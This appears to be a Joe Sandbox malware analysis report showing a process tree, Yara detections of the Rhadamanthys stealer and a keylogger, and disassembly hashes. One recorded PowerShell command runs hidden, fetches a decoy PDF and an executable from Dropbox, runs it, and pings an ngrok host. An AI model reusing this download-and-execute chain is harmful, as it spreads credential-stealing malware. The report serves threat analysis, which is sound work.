                                                                                                                                                                                                                                                                  Start date:19/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6664 --field-trial-handle=2108,i,2589558739445175851,9119733376117647865,262144 /prefetch:8
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:16
                                                                                                                                                                                                                                                                  Start time:07:44:23
                                                                                                                                                                                                                                                                  Start date:19/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\475161710.bat" "
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7b4800000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:17
                                                                                                                                                                                                                                                                  Start time:07:44:23
                                                                                                                                                                                                                                                                  Start date:19/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:19
                                                                                                                                                                                                                                                                  Start time:07:44:24
                                                                                                                                                                                                                                                                  Start date:19/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:powershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/zswwoz1nsshfdhbgdi9dy/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=xb4z4b9qljepnpiu5mkjz888q&dl=1' -OutFile $RandomPDF; Start-Process -FilePath 'msedge.exe' -ArgumentList '--kiosk', $RandomPDF; Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/uv9rtex94bi18x6hfwnvm/runner.exe?rlkey=ohh5enlv6dylr9jqxqwsffkja&dl=1' -OutFile $RandomEXE; Start-Process -FilePath $RandomEXE; if (Test-Path $RandomEXE) { Invoke-WebRequest -Uri 'https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/metadata/f08a7638d48ba191b651003837c0a34d'; }"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:20
                                                                                                                                                                                                                                                                  Start time:07:44:31
                                                                                                                                                                                                                                                                  Start date:19/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-GB --service-sandbox-type=collections --mojo-platform-channel-handle=7884 --field-trial-handle=2108,i,2589558739445175851,9119733376117647865,262144 /prefetch:8
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:21
                                                                                                                                                                                                                                                                  Start time:07:44:32
                                                                                                                                                                                                                                                                  Start date:19/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\aff7310e-e430-4b16-86a8-ee19b2c5c7f2.pdf
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:22
                                                                                                                                                                                                                                                                  Start time:07:44:34
                                                                                                                                                                                                                                                                  Start date:19/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1792,i,8736209801987075174,5153992898519663710,262144 /prefetch:3
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:23
                                                                                                                                                                                                                                                                  Start time:07:44:35
                                                                                                                                                                                                                                                                  Start date:19/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=8304 --field-trial-handle=2108,i,2589558739445175851,9119733376117647865,262144 /prefetch:6
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:25
                                                                                                                                                                                                                                                                  Start time:07:44:42
                                                                                                                                                                                                                                                                  Start date:19/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe"
                                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                                  File size:2'949'120 bytes
                                                                                                                                                                                                                                                                  MD5 hash:F7A506F00E525E6D23AEE43D34219625
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:26
                                                                                                                                                                                                                                                                  Start time:07:44:58
                                                                                                                                                                                                                                                                  Start date:19/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe"
                                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                                  File size:2'949'120 bytes
                                                                                                                                                                                                                                                                  MD5 hash:F7A506F00E525E6D23AEE43D34219625
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000001A.00000003.2666979983.0000000002990000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000001A.00000002.2685573009.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001A.00000003.2674173791.0000000005100000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001A.00000003.2673969723.0000000004EE0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:27
                                                                                                                                                                                                                                                                  Start time:07:45:00
                                                                                                                                                                                                                                                                  Start date:19/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\fontdrvhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\fontdrvhost.exe"
                                                                                                                                                                                                                                                                  Imagebase:0xb70000
                                                                                                                                                                                                                                                                  File size:676'584 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8D0DA0C5DCF1A14F9D65F5C0BEA53F3D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000001B.00000003.2675887330.0000000003540000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000001B.00000002.2790586953.00000000035E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001B.00000003.2679900766.0000000005880000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001B.00000003.2679593309.0000000005660000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:30
                                                                                                                                                                                                                                                                  Start time:07:45:01
                                                                                                                                                                                                                                                                  Start date:19/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8992 -s 204
                                                                                                                                                                                                                                                                  Imagebase:0x3a0000
                                                                                                                                                                                                                                                                  File size:483'680 bytes
                                                                                                                                                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:31
                                                                                                                                                                                                                                                                  Start time:07:45:11
                                                                                                                                                                                                                                                                  Start date:19/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\fontdrvhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\fontdrvhost.exe"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7b5950000
                                                                                                                                                                                                                                                                  File size:827'408 bytes
                                                                                                                                                                                                                                                                  MD5 hash:BBCB897697B3442657C7D6E3EDDBD25F
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:33
                                                                                                                                                                                                                                                                  Start time:07:45:15
                                                                                                                                                                                                                                                                  Start date:19/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\WerFault.exe -u -p 8572 -s 144
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7717b0000
                                                                                                                                                                                                                                                                  File size:570'736 bytes
                                                                                                                                                                                                                                                                  MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:34
                                                                                                                                                                                                                                                                  Start time:07:45:19
                                                                                                                                                                                                                                                                  Start date:19/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6692 --field-trial-handle=2108,i,2589558739445175851,9119733376117647865,262144 /prefetch:8
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                  Disassembly

                                                                                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                                    Function 00007FF848F433B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2395050041.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ff848f40000_powershell.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                                                                                                                                                    • Instruction ID: 8501ce2366aa47fe50c32cae5305b62a305da60d827aaf0f190e9b8a75457062
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B01447111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC3695DB26E882CB45

                                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                                    Function 00007FF848F44CA5 Relevance: 22.1, Strings: 17, Instructions: 865COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2395050041.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ff848f40000_powershell.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: &I$0&I$0&I$8&I$8&I$@&I$I$P&I$X&I$X&I$`&I$h&I$x&I$x&I$&I$&I$&I
                                                                                                                                                                                                                                                                    • API String ID: 0-562959806
                                                                                                                                                                                                                                                                    • Opcode ID: 93741666d99e5e56487782b42f8751f38ecc87a602c2270c81f0e97aa97d3ae3
                                                                                                                                                                                                                                                                    • Instruction ID: 82f1c6de139e6cb9afc372d0e98c6e41559e64ed3d41b2e20ada3c97e9250f0a
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 93741666d99e5e56487782b42f8751f38ecc87a602c2270c81f0e97aa97d3ae3
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F032E263E0F9C24FF269672C38151795B80FFB5E68F0907F7C148674EF99689C0A4289
                                                                                                                                                                                                                                                                    Function 00007FF848F44D0C Relevance: 22.1, Strings: 17, Instructions: 811COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2395050041.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ff848f40000_powershell.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: &I$0&I$0&I$8&I$8&I$@&I$I$P&I$X&I$X&I$`&I$h&I$x&I$x&I$&I$&I$&I
                                                                                                                                                                                                                                                                    • API String ID: 0-562959806
                                                                                                                                                                                                                                                                    • Opcode ID: fd553b7aa8213c9ebc5224a71c0455c8fd32edfbe090154a2340690d1fd364e2
                                                                                                                                                                                                                                                                    • Instruction ID: d9cee6cae793bb736cb7be1123ccbce8e2c3d959cf4f471ccce19688c142488c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fd553b7aa8213c9ebc5224a71c0455c8fd32edfbe090154a2340690d1fd364e2
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E32D163E0F9C24FF269672C3C551796B80FBB5A68F0907FBC148571EF5968AC0A42C9

                                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                                    Function 00007FF848F1A3F8 Relevance: 7.9, Strings: 6, Instructions: 446COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000013.00000002.2601994375.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff848f10000_powershell.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: P.'I$P0'I$p.'I$p/'I$p0'I$p1'I
                                                                                                                                                                                                                                                                    • API String ID: 0-4179380224
                                                                                                                                                                                                                                                                    • Opcode ID: 03057529524f0d176d24c2be43ced0b73e176e0b8c9f4a2050ad87b723f0df59
                                                                                                                                                                                                                                                                    • Instruction ID: 00c9bbc9b6da5d6aaa6b55b6920da3192c8d0ad9d452757cf1cd530ad5777325
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 03057529524f0d176d24c2be43ced0b73e176e0b8c9f4a2050ad87b723f0df59
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EDE1CF71D0DAD58FE756DB7898192A8BFA1FF21740F0801FEC088C71D7EA249D898786
                                                                                                                                                                                                                                                                    Function 00007FF848FE32E5 Relevance: .4, Instructions: 436COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000013.00000002.2602761782.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff848fe0000_powershell.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: fefe94fdd2bc32ee96ca871f7e1bb79a4c11e30ef35cfc13680e97f235a670de
                                                                                                                                                                                                                                                                    • Instruction ID: 0c1f15d42fd3e39dfce2b07aa4f52c83eafc8db8e1bf9ab5460f9ba66f7d04d7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fefe94fdd2bc32ee96ca871f7e1bb79a4c11e30ef35cfc13680e97f235a670de
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7DD11131E0EB8A5FE7A6AB2C58195B5BBE0EF06390F0800FAD04DC71D3DB1CA8058755
                                                                                                                                                                                                                                                                    Function 00007FF848F1A66D Relevance: .2, Instructions: 192COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000013.00000002.2601994375.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff848f10000_powershell.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 8806f58d38aee6164cc09323c8e66be727cff73e5f2b5e6d39f3bf300fb20056
                                                                                                                                                                                                                                                                    • Instruction ID: 774db6df215e02d147e090189a69f3eae2825448e2f9c617b571075d8f0a9caa
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8806f58d38aee6164cc09323c8e66be727cff73e5f2b5e6d39f3bf300fb20056
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C515F70A09A1C8FEBA8EB68D845BE9BBF1FB55310F1041AAD04DD3292DF745985CB41
                                                                                                                                                                                                                                                                    Function 00007FF848F13875 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000013.00000002.2601994375.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff848f10000_powershell.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                                                    • Instruction ID: 041218210bf3ebda801bcf1636a2f0fc2771c13d4c37a1b7e9df559580ca81a5
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F01677111CB0C4FDB48EF0CE451AA5B7E0FB95364F10056EE58AC3695D736E881CB45

                                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                                    Function 00007FF848F19A48 Relevance: 11.7, Strings: 9, Instructions: 469COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000013.00000002.2601994375.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff848f10000_powershell.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: 03'I$05'I$0?'I$0A'I$P3'I$P?'I$PA'I$p?'I$pA'I
                                                                                                                                                                                                                                                                    • API String ID: 0-3248967832
                                                                                                                                                                                                                                                                    • Opcode ID: c442427e6cd73c4ba8f25c31a54ccbc1348b2fa959c7bde534bb828c0ceda86c
                                                                                                                                                                                                                                                                    • Instruction ID: 6f77b3fe110928600cb888151a1f7129da3627a5b134b459251a22dafe41c38f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c442427e6cd73c4ba8f25c31a54ccbc1348b2fa959c7bde534bb828c0ceda86c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D9E18562E0EAC24FF25B96783C1A1356EA1FF52B91B9800FFC1C48A4DF99559D0983C6
                                                                                                                                                                                                                                                                    Function 00007FF848F18178 Relevance: 19.0, Strings: 15, Instructions: 272COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000013.00000002.2601994375.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
